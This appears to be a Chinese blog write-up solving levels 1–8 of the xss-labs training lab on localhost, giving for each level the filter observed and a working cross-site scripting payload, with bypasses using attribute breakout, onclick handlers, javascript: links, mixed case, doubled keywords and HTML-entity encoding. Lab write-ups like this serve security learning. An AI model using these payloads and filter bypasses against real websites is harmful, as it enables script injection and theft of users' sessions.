当前位置: 首页 > news >正文

xss-lab1-8关

news 2025/7/17 10:17:58

第一关

直接在url的name中注入

http://localhost/xss-labs/level1.php?name=<script>alert(1)</script>

第二关

在这里插入图片描述
查看网页代码,使用">闭合value标签

"><script>alert(1)</script>

第三关

先输入任意值,查看代码
在这里插入图片描述
这里显示value属性被过滤,可以构造事件来执行js
尝试发现单引号不会被转义

' onclick='alert(1)

第四关

同三,但此处使用双引号闭合

" onclick="alert(1)

第五关

简单注入js,发现script中加入了下划线
在这里插入图片描述
使用伪协议并闭合input

"><a href=javascript:alert(1)>

第六关

注入后发现href被过滤
在这里插入图片描述
尝试大小写后成功绕过

"><a HRef=javascript:alert(1)>

第七关

直接注入后发现被替换为空
在这里插入图片描述
通过双写绕过

"><scrscriptipt>alert(1)</scrscriptipt>

第八关

直接注入发现js被过滤
在这里插入图片描述
使用unicode绕过

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
http://www.xdnf.cn/news/1132543.html

相关文章:

  • AWS ML Specialist 考试备考指南
  • Liunx练习项目6-创建dns服务器
  • 图机器学习(10)——监督学习中的图神经网络
  • AI Agent开发学习系列 - langchain之LCEL(1):LangChain LCEL链式编排与RAG增强实践
  • 新手向:自动化图片格式转换工具
  • orfeotoolbox ResetMargin
  • 硬件设计学习DAY3——电源Buck电路深度解析:CCM/DCM/BCM模式与电感设计
  • Linux运维新手的修炼手扎之第21天
  • 【论文阅读】A Survey on Knowledge-Oriented Retrieval-Augmented Generation(4)
  • Kotlin比较接口
  • Kotlin获取集合中的元素操作
  • 力扣-146.LRU缓存机制
  • Xsens人形机器人拟人动作AI训练,提升机器人工作精度与效率
  • MybatisPlus-11.IService的批量新增
  • 高性能架构模式——高性能缓存架构
  • alpineLinux修改包管理为国内源
  • 【Linux】基本指令详解(二) 输入\输出重定向、一切皆文件、认识管道、man、cp、mv、echo、cat
  • LVS集群搭建
  • OpenCV稠密光流估计的一个类cv::optflow::DenseRLOFOpticalFlow
  • [AI-video] 字幕服务 | 视频素材服务 | 视频生成服务
  • 智能电网时代:双向WiFi电表在海外家庭能源中的战略价值
  • C++---emplace_back与push_back
  • 网络爬虫的相关知识和操作
  • lazyvim恢复gt键
  • 项目流程管理系统使用建议:推荐13款
  • 【27】MFC入门到精通——MFC 修改用户界面登录IP IP Address Control
  • DHTMLX Suite 9.2 重磅发布:支持历史记录、类Excel交互、剪贴板、拖放增强等多项升级
  • AWS IAM 最佳安全实践通用指南
  • 随机链表的复制数据结构oj题(力口138)
  • HTML进阶